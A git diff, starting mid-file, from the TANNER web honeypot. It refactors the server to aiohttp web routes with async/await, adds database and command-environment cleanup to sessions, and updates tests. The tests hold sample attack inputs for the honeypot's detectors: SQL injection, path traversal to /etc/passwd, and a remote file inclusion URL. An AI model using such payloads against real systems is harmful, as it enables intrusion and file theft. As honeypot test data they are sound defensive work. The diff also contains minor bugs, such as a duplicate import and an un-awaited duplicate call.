-LOGGER = logging.getLogger(__name__)
-
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
-class HttpRequestHandler(aiohttp.server.ServerHttpProtocol):
- redis_client = None
- session_manager = session_manager.SessionManager()
- dorks = dorks_manager.DorksManager()
+class TannerServer:
+ def __init__(self):
+ base_dir = TannerConfig.get('EMULATORS', 'root_dir')
+ db_name = TannerConfig.get('SQLI', 'db_name')
- def __init__(self, *args, **kwargs):
- super(HttpRequestHandler, self).__init__()
+ self.session_manager = session_manager.SessionManager()
+ self.dorks = dorks_manager.DorksManager()
self.api = api.Api()
- self.base_handler = base.BaseHandler(kwargs['base_dir'], kwargs['db_name'])
- self.logger = logging.getLogger(__name__ + '.' + self.__class__.__name__)
+ self.base_handler = base.BaseHandler(base_dir, db_name)
+ self.logger = logging.getLogger(__name__)
+ self.redis_client = None
@staticmethod
def _make_response(msg):
- response_message = json.dumps(dict(
+ response_message = dict(
version=1,
response=dict(message=msg)
- )).encode('utf-8')
+ )
return response_message
- @asyncio.coroutine
- def handle_event(self, data, redis_client):
+ @staticmethod
+ async def default_handler(request):
+ return web.Response(text="Tanner server")
+
+ async def handle_event(self, request):
+ data = await request.read()
try:
data = json.loads(data.decode('utf-8'))
- path = unquote(data['path'])
+ path = yarl.unquote(data['path'])
except (TypeError, ValueError, KeyError) as error:
self.logger.error('error parsing request: %s', data)
response_msg = self._make_response(msg=type(error).__name__)
else:
- session = yield from HttpRequestHandler.session_manager.add_or_update_session(
+ session = await self.session_manager.add_or_update_session(
data, self.redis_client
)
self.logger.info('Requested path %s', path)
- yield from self.dorks.extract_path(path, redis_client)
- detection = yield from self.base_handler.handle(data, session, path)
- session.set_attack_type(path, detection['name'])
+ await self.dorks.extract_path(path, self.redis_client)
+ detection = await self.base_handler.handle(data, session, path)
+ session.set_attack_type(path, detection["name"])
+
response_msg = self._make_response(msg=dict(detection=detection, sess_uuid=session.get_uuid()))
self.logger.info('TANNER response %s', response_msg)
session_data = data
- session_data['response_msg'] = json.loads(response_msg.decode('utf-8'))
+ session_data['response_msg'] = response_msg
# Log to Mongo
- if config.TannerConfig.get('MONGO', 'enabled') == 'True':
+ if TannerConfig.get('MONGO', 'enabled') == 'True':
db = mongo_report()
session_id = db.create_session(session_data)
self.logger.info("Writing session to DB: {}".format(session_id))
- if config.TannerConfig.get('LOCALLOG', 'enabled') == 'True':
+ if TannerConfig.get('LOCALLOG', 'enabled') == 'True':
lr = local_report()
lr.create_session(session_data)
+ return web.json_response(response_msg)
- return response_msg
-
- @asyncio.coroutine
- def handle_request(self, message, payload):
- response = aiohttp.Response(
- self.writer, 200, http_version=message.version
- )
- if message.path == '/dorks':
- dorks = yield from self.dorks.choose_dorks(self.redis_client)
- response_msg = json.dumps(
- dict(version=1, response=dict(dorks=dorks)),
- sort_keys=True, indent=2
- ).encode('utf-8')
- elif message.path == '/event':
- data = yield from payload.read()
- response_msg = yield from self.handle_event(data, self.redis_client)
- elif message.path.startswith('/api'):
- data = yield from self.api.handle_api_request(message.path, self.redis_client)
- response_msg = self._make_response(data)
+ async def handle_api(self, request):
+ api_query = request.match_info.get("api_query")
+ if api_query is None:
+ data = "tanner api"
else:
- response_msg = self._make_response(msg='')
-
- response.add_header('Content-Type', 'application/json')
- response.add_header('Content-Length', str(len(response_msg)))
- response.send_headers()
- response.write(response_msg)
- yield from response.write_eof()
-
-
-@asyncio.coroutine
-def get_redis_client():
- try:
- host = config.TannerConfig.get('REDIS', 'host')
- port = config.TannerConfig.get('REDIS', 'port')
- poolsize = config.TannerConfig.get('REDIS', 'poolsize')
- timeout = config.TannerConfig.get('REDIS', 'timeout')
- redis_client = yield from asyncio.wait_for(asyncio_redis.Pool.create(
- host=host, port=int(port), poolsize=int(poolsize)), timeout=int(timeout))
- except asyncio.TimeoutError as timeout_error:
- LOGGER.error('Problem with redis connection. Please, check your redis server. %s', timeout_error)
- exit()
- else:
- HttpRequestHandler.redis_client = redis_client
-
-
-def run_server():
- loop = asyncio.get_event_loop()
- srv = None
- try:
- if HttpRequestHandler.redis_client is None:
- loop.run_until_complete(get_redis_client())
- f = loop.create_server(
- lambda: HttpRequestHandler(debug=False, keep_alive=75,
- base_dir=config.TannerConfig.get('EMULATORS', 'root_dir'),
- db_name=config.TannerConfig.get('SQLI', 'db_name')),
- config.TannerConfig.get('TANNER', 'host'), int(config.TannerConfig.get('TANNER', 'port')))
- srv = loop.run_until_complete(f)
- LOGGER.info('serving on %s', srv.sockets[0].getsockname())
- loop.run_forever()
- except KeyboardInterrupt:
- pass
- finally:
- if HttpRequestHandler.redis_client is not None:
- HttpRequestHandler.redis_client.close()
- if srv:
- srv.close()
- loop.run_until_complete(srv.wait_closed())
- loop.close()
+ data = await self.api.handle_api_request(api_query, request.url.query, self.redis_client)
+ response_msg = self._make_response(data)
+ return web.json_response(response_msg)
+
+ async def handle_dorks(self, request):
+ dorks = await self.dorks.choose_dorks(self.redis_client)
+ response_msg = dict(version=1, response=dict(dorks=dorks))
+ return web.json_response(response_msg)
+
+ def setup_routes(self, app):
+ app.router.add_route('*', '/', self.default_handler)
+ app.router.add_post('/event', self.handle_event)
+ app.router.add_get('/api', self.handle_api)
+ app.router.add_get('/api/{api_query}', self.handle_api)
+ app.router.add_get('/dorks', self.handle_dorks)
+
+ def create_app(self, loop):
+ app = web.Application(loop=loop)
+ self.setup_routes(app)
+ return app
+
+ def start(self):
+ loop = asyncio.get_event_loop()
+ tanner_app = self.create_app(loop)
+ self.redis_client = loop.run_until_complete(redis_client.RedisClient.get_redis_client())
+ host = TannerConfig.get('TANNER', 'host')
+ port = TannerConfig.get('TANNER', 'port')
+ web.run_app(tanner_app, host=host, port=port)
diff --git a/tanner/session.py b/tanner/session.py
index 356f8c1c..0f144605 100644
--- a/tanner/session.py
+++ b/tanner/session.py
@@ -1,8 +1,13 @@
+import asyncio
import json
import time
-import os
+import asyncio
import uuid
+from tanner.config import TannerConfig
+from tanner.emulators import cmd_exec
+from tanner.utils.mysql_db_helper import MySQLDBHelper
+from tanner.utils.sqlite_db_helper import SQLITEDBHelper
class Session:
KEEP_ALIVE_TIME = 75
@@ -17,6 +22,7 @@ def __init__(self, data):
'response_status': data['status']}]
self.cookies = data['cookies']
self.associated_db = None
+ self.associated_env = None
except KeyError:
raise
@@ -59,9 +65,17 @@ def set_attack_type(self, path, attack_type):
def associate_db(self, db_name):
self.associated_db = db_name
- def remove_associated_db(self):
- if self.associated_db is not None and os.path.exists(self.associated_db):
- os.remove(self.associated_db)
+ async def remove_associated_db(self):
+ if(TannerConfig.get('SQLI', 'type') == 'MySQL'):
+ await MySQLDBHelper().delete_db(self.associated_db)
+ else:
+ SQLITEDBHelper().delete_db(self.associated_db)
+
+ def associate_env(self, env):
+ self.associated_env = env
+
+ async def remove_associated_env(self):
+ await cmd_exec.CmdExecEmulator().delete_env(self.associated_env)
def get_uuid(self):
return str(self.sess_uuid)
diff --git a/tanner/session_analyzer.py b/tanner/session_analyzer.py
index dabf031d..3a807fe5 100644
--- a/tanner/session_analyzer.py
+++ b/tanner/session_analyzer.py
@@ -10,43 +10,41 @@
class SessionAnalyzer:
- def __init__(self):
- self.queue = asyncio.Queue()
+ def __init__(self, loop=None):
+ self._loop = loop if loop is not None else asyncio.get_event_loop()
+ self.queue = asyncio.Queue(loop=self._loop)
self.logger = logging.getLogger('tanner.session_analyzer.SessionAnalyzer')
- @asyncio.coroutine
- def analyze(self, session_key, redis_client):
+ async def analyze(self, session_key, redis_client):
session = None
- yield from asyncio.sleep(1)
+ await asyncio.sleep(1, loop=self._loop)
try:
- session = yield from redis_client.get(session_key)
+ session = await redis_client.get(session_key)
session = json.loads(session)
except (asyncio_redis.NotConnectedError, TypeError, ValueError) as error:
self.logger.error('Can\'t get session for analyze: %s', error)
else:
- result = yield from self.create_stats(session, redis_client)
- yield from self.queue.put(result)
- yield from self.save_session(redis_client)
+ result = await self.create_stats(session, redis_client)
+ await self.queue.put(result)
+ await self.save_session(redis_client)
- @asyncio.coroutine
- def save_session(self, redis_client):
+ async def save_session(self, redis_client):
while not self.queue.empty():
- session = yield from self.queue.get()
+ session = await self.queue.get()
s_key = session['sensor_uuid']
del_key = session['sess_uuid']
try:
- yield from redis_client.lpush(s_key, [json.dumps(session)])
- yield from redis_client.delete([del_key])
+ await redis_client.lpush(s_key, [json.dumps(session)])
+ await redis_client.delete([del_key])
except asyncio_redis.NotConnectedError as redis_error:
self.logger.error('Error with redis. Session will be returned to the queue: %s',
redis_error)
self.queue.put(session)
- @asyncio.coroutine
- def create_stats(self, session, redis_client):
+ async def create_stats(self, session, redis_client):
sess_duration = session['end_time'] - session['start_time']
rps = sess_duration / session['count']
- tbr, errors, hidden_links, attack_types = yield from self.analyze_paths(session['paths'],
+ tbr, errors, hidden_links, attack_types = await self.analyze_paths(session['paths'],
redis_client)
stats = dict(
@@ -72,12 +70,11 @@ def create_stats(self, session, redis_client):
return stats
@staticmethod
- @asyncio.coroutine
- def analyze_paths(paths, redis_client):
+ async def analyze_paths(paths, redis_client):
tbr = []
attack_types = []
current_path = paths[0]
- dorks = yield from redis_client.smembers_asset(DorksManager.dorks_key)
+ dorks = await redis_client.smembers_asset(DorksManager.dorks_key)
for i, path in enumerate(paths, start=1):
tbr.append(path['timestamp'] - current_path['timestamp'])
diff --git a/tanner/session_manager.py b/tanner/session_manager.py
index 81e3e9c0..ad7aac73 100644
--- a/tanner/session_manager.py
+++ b/tanner/session_manager.py
@@ -8,19 +8,18 @@
class SessionManager:
- def __init__(self):
+ def __init__(self, loop=None):
self.sessions = []
- self.analyzer = SessionAnalyzer()
- self.logger = logging.getLogger('tanner.session_manager.SessionManager')
+ self.analyzer = SessionAnalyzer(loop=loop)
+ self.logger = logging.getLogger(__name__)
- @asyncio.coroutine
- def add_or_update_session(self, raw_data, redis_client):
+ async def add_or_update_session(self, raw_data, redis_client):
# prepare the list of sessions
- yield from self.delete_old_sessions(redis_client)
+ await self.delete_old_sessions(redis_client)
# handle raw data
valid_data = self.validate_data(raw_data)
# push snare uuid into redis.
- yield from redis_client.sadd('snare_ids', [valid_data['uuid']])
+ await redis_client.sadd('snare_ids', [valid_data['uuid']])
session = self.get_session(valid_data)
if session is None:
try:
@@ -67,16 +66,17 @@ def get_session(self, data):
break
return session
- @asyncio.coroutine
- def delete_old_sessions(self, redis_client):
+ async def delete_old_sessions(self, redis_client):
for sess in self.sessions:
if not sess.is_expired():
continue
+ await sess.remove_associated_db()
sess.remove_associated_db()
+ await sess.remove_associated_env()
self.sessions.remove(sess)
try:
- yield from redis_client.set(sess.get_uuid(), sess.to_json())
- yield from self.analyzer.analyze(sess.get_uuid(), redis_client)
+ await redis_client.set(sess.get_uuid(), sess.to_json())
+ await self.analyzer.analyze(sess.get_uuid(), redis_client)
except asyncio_redis.NotConnectedError as redis_error:
self.logger.error('Error connect to redis, session stay in memory. %s', redis_error)
self.sessions.append(sess)
diff --git a/tanner/tests/test_base.py b/tanner/tests/test_base.py
index 1ebda165..88845c19 100644
--- a/tanner/tests/test_base.py
+++ b/tanner/tests/test_base.py
@@ -1,127 +1,114 @@
import asyncio
import unittest
-from tanner.emulators import base
from unittest import mock
-class TestBase(unittest.TestCase):
- def setUp(self):
- self.session = mock.Mock()
- self.session.associate_db = mock.Mock()
- self.data = mock.Mock()
- with mock.patch('tanner.emulators.lfi.LfiEmulator', mock.Mock(), create=True):
- self.handler = base.BaseHandler('/tmp/', 'test.db')
+from tanner.emulators import base
- def test_handle_get_sqli(self):
- path = '/index.html?id=1 UNION SELECT 1'
- @asyncio.coroutine
- def mock_sqli_check_get_data(path):
- return 1;
+class TestBase(unittest.TestCase):
+ def setUp(self):
+ self.loop = asyncio.new_event_loop()
+ asyncio.set_event_loop(None)
+ self.session = mock.Mock()
+ self.session.associate_db = mock.Mock()
+ self.data = mock.Mock()
+ with mock.patch('tanner.emulators.lfi.LfiEmulator', mock.Mock(), create=True):
+ self.handler = base.BaseHandler('/tmp/', 'test.db', self.loop)
- @asyncio.coroutine
- def mock_sqli_handle(path, session, post_request=0):
- return 'sqli_test_payload'
+ def test_handle_get_sqli(self):
+ path = '/index.html?id=1 UNION SELECT 1'
- self.handler.emulators['sqli'] = mock.Mock()
- self.handler.emulators['sqli'].check_get_data = mock_sqli_check_get_data
- self.handler.emulators['sqli'].handle = mock_sqli_handle
+ async def mock_sqli_check_get_data(path):
+ return 1
- loop = asyncio.get_event_loop()
- detection = loop.run_until_complete(self.handler.handle_get(self.session, path))
+ async def mock_sqli_handle(path, session, post_request=0):
+ return 'sqli_test_payload'
- assert_detection = {'name': 'sqli', 'order': 2, 'payload': 'sqli_test_payload'}
- self.assertDictEqual(detection, assert_detection)
+ self.handler.emulators['sqli'] = mock.Mock()
+ self.handler.emulators['sqli'].check_get_data = mock_sqli_check_get_data
+ self.handler.emulators['sqli'].handle = mock_sqli_handle
+ detection = self.loop.run_until_complete(self.handler.handle_get(self.session, path))
- def test_handle_get_xss(self):
- path = '/index.html?id='
+ assert_detection = {'name': 'sqli', 'order': 2, 'payload': 'sqli_test_payload'}
+ self.assertDictEqual(detection, assert_detection)
- @asyncio.coroutine
- def mock_xss_handle(path, session, post_request=0):
- return 'xss_test_payload'
+ def test_handle_get_xss(self):
+ path = '/index.html?id='
- self.handler.emulators['xss'] = mock.Mock()
- self.handler.emulators['xss'].handle = mock_xss_handle
+ async def mock_xss_handle(path, session, post_request=0):
+ return 'xss_test_payload'
- loop = asyncio.get_event_loop()
- detection = loop.run_until_complete(self.handler.handle_get(self.session, path))
+ self.handler.emulators['xss'] = mock.Mock()
+ self.handler.emulators['xss'].handle = mock_xss_handle
- assert_detection = {'name': 'xss', 'order': 3, 'payload': 'xss_test_payload'}
- self.assertDictEqual(detection, assert_detection)
+ detection = self.loop.run_until_complete(self.handler.handle_get(self.session, path))
- def test_handle_get_lfi(self):
- path = '/index.html?file=/etc/passwd'
+ assert_detection = {'name': 'xss', 'order': 3, 'payload': 'xss_test_payload'}
+ self.assertDictEqual(detection, assert_detection)
- @asyncio.coroutine
- def mock_lfi_handle(path, session, post_request=0):
- return 'lfi_test_payload'
+ def test_handle_get_lfi(self):
+ path = '/index.html?file=/etc/passwd'
- self.handler.emulators['lfi'] = mock.Mock()
- self.handler.emulators['lfi'].handle = mock_lfi_handle
+ async def mock_lfi_handle(path, session, post_request=0):
+ return 'lfi_test_payload'
- loop = asyncio.get_event_loop()
- detection = loop.run_until_complete(self.handler.handle_get(self.session, path))
+ self.handler.emulators['lfi'] = mock.Mock()
+ self.handler.emulators['lfi'].handle = mock_lfi_handle
- assert_detection = {'name': 'lfi', 'order': 2, 'payload': 'lfi_test_payload'}
- self.assertDictEqual(detection, assert_detection)
+ detection = self.loop.run_until_complete(self.handler.handle_get(self.session, path))
- def test_handle_get_index(self):
- path = '/index.html'
+ assert_detection = {'name': 'lfi', 'order': 2, 'payload': 'lfi_test_payload'}
+ self.assertDictEqual(detection, assert_detection)
- loop = asyncio.get_event_loop()
- detection = loop.run_until_complete(self.handler.handle_get(self.session, path))
+ def test_handle_get_index(self):
+ path = '/index.html'
- assert_detection = detection = {'name': 'index', 'order': 1}
- self.assertDictEqual(detection, assert_detection)
+ detection = self.loop.run_until_complete(self.handler.handle_get(self.session, path))
- def test_handle_get_lfi(self):
- path = '/wp-content'
+ assert_detection = detection = {'name': 'index', 'order': 1}
+ self.assertDictEqual(detection, assert_detection)
- loop = asyncio.get_event_loop()
- detection = loop.run_until_complete(self.handler.handle_get(self.session, path))
+ def test_handle_get_wp_content(self):
+ path = '/wp-content'
- assert_detection = detection = {'name': 'wp-content', 'order': 1}
- self.assertDictEqual(detection, assert_detection)
+ detection = self.loop.run_until_complete(self.handler.handle_get(self.session, path))
- def test_handle_get_rfi(self):
- path = '/index.html?file=http://attack.php'
+ assert_detection = detection = {'name': 'wp-content', 'order': 1}
+ self.assertDictEqual(detection, assert_detection)
- @asyncio.coroutine
- def mock_rfi_handle(path, session, post_request=0):
- return 'rfi_test_payload'
+ def test_handle_get_rfi(self):
+ path = '/index.html?file=http://attack.php'
- self.handler.emulators['rfi'] = mock.Mock()
- self.handler.emulators['rfi'].handle = mock_rfi_handle
+ async def mock_rfi_handle(path, session, post_request=0):
+ return 'rfi_test_payload'
- loop = asyncio.get_event_loop()
- detection = loop.run_until_complete(self.handler.handle_get(self.session, path))
+ self.handler.emulators['rfi'] = mock.Mock()
+ self.handler.emulators['rfi'].handle = mock_rfi_handle
- assert_detection = {'name': 'rfi', 'order': 2, 'payload': 'rfi_test_payload'}
- self.assertDictEqual(detection, assert_detection)
+ detection = self.loop.run_until_complete(self.handler.handle_get(self.session, path))
- def test_handle_post_xss(self):
+ assert_detection = {'name': 'rfi', 'order': 2, 'payload': 'rfi_test_payload'}
+ self.assertDictEqual(detection, assert_detection)
- @asyncio.coroutine
- def mock_xss_handle(value, session, raw_data=None):
- return 'xss_test_payload'
+ def test_handle_post_xss(self):
+ async def mock_xss_handle(value, session, raw_data=None):
+ return 'xss_test_payload'
- self.handler.emulators['xss'] = mock.Mock()
- self.handler.emulators['xss'].handle = mock_xss_handle
+ self.handler.emulators['xss'] = mock.Mock()
+ self.handler.emulators['xss'].handle = mock_xss_handle
- @asyncio.coroutine
- def mock_sqli_check_post_data(data):
- return 1;
+ async def mock_sqli_check_post_data(data):
+ return 1
- @asyncio.coroutine
- def mock_sqli_handle(path, session, post_request=0):
- return None
+ async def mock_sqli_handle(path, session, post_request=0):
+ return None
- self.handler.emulators['sqli'] = mock.Mock()
- self.handler.emulators['sqli'].check_post_data = mock_sqli_check_post_data
- self.handler.emulators['sqli'].handle = mock_sqli_handle
+ self.handler.emulators['sqli'] = mock.Mock()
+ self.handler.emulators['sqli'].check_post_data = mock_sqli_check_post_data
+ self.handler.emulators['sqli'].handle = mock_sqli_handle
- loop = asyncio.get_event_loop()
- detection = loop.run_until_complete(self.handler.handle_post(self.session, self.data))
+ detection = self.loop.run_until_complete(self.handler.handle_post(self.session, self.data))
- assert_detection = {'name': 'xss', 'order': 2, 'payload': 'xss_test_payload'}
- self.assertDictEqual(detection, assert_detection)
+ assert_detection = {'name': 'xss', 'order': 2, 'payload': 'xss_test_payload'}
+ self.assertDictEqual(detection, assert_detection)
diff --git a/tanner/tests/test_config.py b/tanner/tests/test_config.py
index 94d2e1dd..020fac11 100644
--- a/tanner/tests/test_config.py
+++ b/tanner/tests/test_config.py
@@ -1,70 +1,72 @@
-import unittest
import configparser
import os
+import unittest
+
from tanner import config
class TestCongif(unittest.TestCase):
- def setUp(self):
- config.TannerConfig.config = None
- self.d = {'DATA': {'db_config': '/tmp/user_tanner/db/db_config.json', 'dorks': '/tmp/user_tanner/data/dorks.pickle',
- 'user_dorks': '/tmp/user_tanner/data/user_dorks.pickle',
- 'vdocs': '/tmp/user_tanner/data/vdocs.json'},
- 'TANNER': {'host': '0.0.0.0', 'port': '9000'},
- 'REDIS': {'host': 'localhost', 'port': '1337', 'poolsize': '40', 'timeout': '5'},
- 'EMULATORS': {'root_dir': '/tmp/user_tanner'},
- 'SQLI': {'db_name': 'user_tanner.db'},
- 'LOGGER': {'log_debug': '/opt/tanner/tanner.log', 'log_err': '/opt/tanner/tanner.err'},
- 'MONGO': {'enabled': 'False', 'URI': 'mongodb://localhost'},
- 'LOCALLOG': {'enabled': 'False', 'PATH': '/tmp/user_tanner_report.json'}
- }
-
- self.valid_config_path = '/tmp/tanner_config'
- self.cfg = configparser.ConfigParser()
- if not os.path.exists(self.valid_config_path):
- for section in self.d:
- self.cfg.add_section(section)
- for value, data in self.d[section].items():
- self.cfg.set(section, value, data)
- f = open(self.valid_config_path, 'w')
- self.cfg.write(f)
- else:
- self.cfg.read(self.valid_config_path)
-
- self.invalid_config_path = '/random/random_name'
+ def setUp(self):
+ config.TannerConfig.config = None
+ self.d = {
+ 'DATA': {'db_config': '/tmp/user_tanner/db/db_config.json', 'dorks': '/tmp/user_tanner/data/dorks.pickle',
+ 'user_dorks': '/tmp/user_tanner/data/user_dorks.pickle',
+ 'vdocs': '/tmp/user_tanner/data/vdocs.json'},
+ 'TANNER': {'host': '0.0.0.0', 'port': '9000'},
+ 'REDIS': {'host': 'localhost', 'port': '1337', 'poolsize': '40', 'timeout': '5'},
+ 'EMULATORS': {'root_dir': '/tmp/user_tanner'},
+ 'SQLI': {'type':'SQLITE', 'db_name': 'user_tanner_db', 'host':'localhost', 'user':'user_name', 'password':'user_pass'},
+ 'CMD_EXEC': {'host_image': 'test_image'},
+ 'LOGGER': {'log_debug': '/opt/tanner/tanner.log', 'log_err': '/opt/tanner/tanner.err'},
+ 'MONGO': {'enabled': 'False', 'URI': 'mongodb://localhost'},
+ 'LOCALLOG': {'enabled': 'False', 'PATH': '/tmp/user_tanner_report.json'}
+ }
- def test_set_config_when_file_exists(self):
- config.TannerConfig.set_config(self.valid_config_path)
- self.assertIsNotNone(config.TannerConfig.config)
+ self.valid_config_path = '/tmp/tanner_config'
+ self.cfg = configparser.ConfigParser()
+ if not os.path.exists(self.valid_config_path):
+ for section in self.d:
+ self.cfg.add_section(section)
+ for value, data in self.d[section].items():
+ self.cfg.set(section, value, data)
+ f = open(self.valid_config_path, 'w')
+ self.cfg.write(f)
+ else:
+ self.cfg.read(self.valid_config_path)
- def test_set_config_when_file_dont_exists(self):
- with self.assertRaises(SystemExit):
- config.TannerConfig.set_config(self.invalid_config_path)
- self.assertIsNone(config.TannerConfig.config)
+ self.invalid_config_path = '/random/random_name'
- def test_get_when_file_exists(self):
- config.TannerConfig.config = self.cfg
- for section in self.d:
- for value, assertion_data in self.d[section].items():
- data = config.TannerConfig.get(section, value)
- self.assertEqual(data, assertion_data)
+ def test_set_config_when_file_exists(self):
+ config.TannerConfig.set_config(self.valid_config_path)
+ self.assertIsNotNone(config.TannerConfig.config)
- def test_get_when_file_dont_exists(self):
- config_template = {'DATA': {'db_config': '/opt/tanner/db/db_config.json', 'dorks': '/opt/tanner/data/dorks.pickle',
- 'user_dorks': '/opt/tanner/data/user_dorks.pickle',
- 'vdocs': '/opt/tanner/data/vdocs.json'},
- 'TANNER': {'host': '0.0.0.0', 'port': 8090},
- 'REDIS': {'host': 'localhost', 'port': 6379, 'poolsize': 80, 'timeout': 1},
- 'EMULATORS': {'root_dir': '/opt/tanner'},
- 'SQLI': {'db_name': 'tanner.db'},
- 'LOGGER': {'log_debug': '/opt/tanner/tanner.log', 'log_err': '/opt/tanner/tanner.err'},
- 'MONGO': {'enabled': 'False', 'URI': 'mongodb://localhost'},
- 'LOCALLOG': {'enabled': 'False', 'PATH': '/tmp/tanner_report.json'}
- }
+ def test_set_config_when_file_dont_exists(self):
+ with self.assertRaises(SystemExit):
+ config.TannerConfig.set_config(self.invalid_config_path)
+ self.assertIsNone(config.TannerConfig.config)
- for section in config_template:
- for value, assertion_data in config_template[section].items():
- data = config.TannerConfig.get(section, value)
- self.assertEqual(data, assertion_data)
+ def test_get_when_file_exists(self):
+ config.TannerConfig.config = self.cfg
+ for section in self.d:
+ for value, assertion_data in self.d[section].items():
+ data = config.TannerConfig.get(section, value)
+ self.assertEqual(data, assertion_data)
+ def test_get_when_file_dont_exists(self):
+ config_template = {
+ 'DATA': {'db_config': '/opt/tanner/db/db_config.json', 'dorks': '/opt/tanner/data/dorks.pickle',
+ 'user_dorks': '/opt/tanner/data/user_dorks.pickle',
+ 'vdocs': '/opt/tanner/data/vdocs.json'},
+ 'TANNER': {'host': '0.0.0.0', 'port': 8090},
+ 'REDIS': {'host': 'localhost', 'port': 6379, 'poolsize': 80, 'timeout': 1},
+ 'EMULATORS': {'root_dir': '/opt/tanner'},
+ 'SQLI': {'type':'SQLITE', 'db_name': 'tanner_db', 'host':'localhost', 'user':'root', 'password':'user_pass'},
+ 'CMD_EXEC': {'host_image': 'busybox:latest'},
+ 'LOGGER': {'log_debug': '/opt/tanner/tanner.log', 'log_err': '/opt/tanner/tanner.err'},
+ 'MONGO': {'enabled': 'False', 'URI': 'mongodb://localhost'},
+ 'LOCALLOG': {'enabled': 'False', 'PATH': '/tmp/tanner_report.json'}
+ }
-
+ for section in config_template:
+ for value, assertion_data in config_template[section].items():
+ data = config.TannerConfig.get(section, value)
+ self.assertEqual(data, assertion_data)
diff --git a/tanner/tests/test_lfi_emulator.py b/tanner/tests/test_lfi_emulator.py
index 09c71772..45cfab95 100644
--- a/tanner/tests/test_lfi_emulator.py
+++ b/tanner/tests/test_lfi_emulator.py
@@ -1,27 +1,33 @@
+import os
import unittest
from unittest import mock
-import os
-from tanner.emulators import lfi
+import asyncio
from tanner import config
-
+from tanner.emulators import lfi
+import yarl
class TestLfiEmulator(unittest.TestCase):
def setUp(self):
- vdocs = os.path.join(os.getcwd(),'data/vdocs.json')
+ self.loop = asyncio.new_event_loop()
+ asyncio.set_event_loop(None)
+ vdocs = os.path.join(os.getcwd(), 'data/vdocs.json')
config.TannerConfig.get = mock.MagicMock(return_value=vdocs)
self.handler = lfi.LfiEmulator('/tmp/')
def test_handle_abspath_lfi(self):
path = '/?foo=/etc/passwd'
- result = yield from self.handler.handle(path)
+ query = yarl.URL(path).query
+ result = self.loop.run_until_complete(self.handler.handle(query['foo']))
self.assertIn('root:x:0:0:root:/root:/bin/bash', result)
def test_handle_relative_path_lfi(self):
path = '/?foo=../../../../../etc/passwd'
- result = yield from self.handler.handle(path)
+ query = yarl.URL(path).query
+ result = self.loop.run_until_complete(self.handler.handle(query['foo']))
self.assertIn('root:x:0:0:root:/root:/bin/bash', result)
def test_handle_missing_lfi(self):
path = '/?foo=../../../../../etc/bar'
- result = yield from self.handler.handle(path)
+ query = yarl.URL(path).query
+ result = self.loop.run_until_complete(self.handler.handle(query['foo']))
self.assertIsNone(result)
diff --git a/tanner/tests/test_rfi_emulation.py b/tanner/tests/test_rfi_emulation.py
index 25df6c06..db43261e 100644
--- a/tanner/tests/test_rfi_emulation.py
+++ b/tanner/tests/test_rfi_emulation.py
@@ -1,41 +1,45 @@
import asyncio
+import ftplib
import unittest
-import aiohttp
-
from tanner.emulators import rfi
class TestRfiEmulator(unittest.TestCase):
def setUp(self):
- self.handler = rfi.RfiEmulator('/tmp/')
+ self.loop = asyncio.new_event_loop()
+ asyncio.set_event_loop(None)
+ self.handler = rfi.RfiEmulator('/tmp/', loop=self.loop)
def test_http_download(self):
path = 'http://example.com'
- data = asyncio.get_event_loop().run_until_complete(self.handler.download_file(path))
+ data = self.loop.run_until_complete(self.handler.download_file(path))
self.assertIsNotNone(data)
def test_http_download_fail(self):
path = 'http://foobarfvfd'
- filename = asyncio.get_event_loop().run_until_complete(self.handler.download_file(path))
+ filename = self.loop.run_until_complete(self.handler.download_file(path))
self.assertIsNone(filename)
def test_ftp_download(self):
path = 'ftp://mirror.yandex.ru/archlinux/lastupdate'
- data = asyncio.get_event_loop().run_until_complete(self.handler.download_file(path))
+ data = self.loop.run_until_complete(self.handler.download_file(path))
self.assertIsNotNone(data)
def test_ftp_download_fail(self):
path = 'ftp://mirror.yandex.ru/archlinux/foobar'
- with self.assertRaises(aiohttp.errors.ClientOSError):
- yield from self.handler.download_file(path)
+
+ with self.assertLogs():
+ self.loop.run_until_complete(self.handler.download_file(path))
+
def test_get_result_fail(self):
data = "test data"
- with self.assertRaises(aiohttp.errors.ClientOSError):
- yield from self.handler.get_rfi_result(data)
+ result = self.loop.run_until_complete(self.handler.get_rfi_result(data))
+ self.assertIsNone(result)
+
def test_invalid_scheme(self):
path = 'file://mirror.yandex.ru/archlinux/foobar'
- data = asyncio.get_event_loop().run_until_complete(self.handler.download_file(path))
- self.assertIsNone(data)
\ No newline at end of file
+ data = self.loop.run_until_complete(self.handler.download_file(path))
+ self.assertIsNone(data)
diff --git a/tanner/tests/test_server.py b/tanner/tests/test_server.py
index 8c1b8f50..53b32cbe 100644
--- a/tanner/tests/test_server.py
+++ b/tanner/tests/test_server.py
@@ -1,133 +1,109 @@
import asyncio
-import json
-import unittest
-from unittest import mock
import uuid
+from unittest import mock
+
+from aiohttp.test_utils import AioHTTPTestCase, unittest_run_loop
from tanner import server
-from tanner import config
+from tanner.config import TannerConfig
-class TestServer(unittest.TestCase):
+class TestServer(AioHTTPTestCase):
def setUp(self):
d = dict(MONGO={'enabled': 'False', 'URI': 'mongodb://localhost'},
LOCALLOG={'enabled': 'False', 'PATH': '/tmp/tanner_report.json'})
m = mock.MagicMock()
m.__getitem__.side_effect = d.__getitem__
m.__iter__.side_effect = d.__iter__
- config.TannerConfig.config = m
-
- @asyncio.coroutine
- def choosed(client):
- return [x for x in range(10)]
-
- dorks = mock.Mock()
- attrs = {'extract_path.return_value': (lambda: (yield None))()}
- dorks.configure_mock(**attrs)
- dorks.choose_dorks = choosed
+ TannerConfig.config = m
- self.MockedRequestHandler = server.HttpRequestHandler
- self.MockedRequestHandler.redis_client = mock.Mock()
with mock.patch('tanner.dorks_manager.DorksManager', mock.Mock()):
- with mock.patch('tanner.emulators.lfi.LfiEmulator', mock.Mock(), create=True):
- self.handler = self.MockedRequestHandler(debug=False, keep_alive=75, base_dir='/tmp/', db_name='test.db')
-
- self.handler.dorks = dorks
- self.handler.writer = mock.Mock()
+ with mock.patch('tanner.emulators.base.BaseHandler', mock.Mock(), create=True):
+ with mock.patch('tanner.session_manager.SessionManager', mock.Mock(), create=True):
+ self.serv = server.TannerServer()
self.test_uuid = uuid.uuid4()
- @asyncio.coroutine
- def add_or_update_mock(data, client):
+
+ async def _add_or_update_mock(data, client):
sess = mock.Mock()
sess.set_attack_type = mock.Mock()
+ test_uuid = uuid
sess.get_uuid = mock.Mock(return_value=str(self.test_uuid))
return sess
- self.handler.session_manager.add_or_update_session = add_or_update_mock
- # self.handler.dorks = dorks
-
- self.m = mock.Mock()
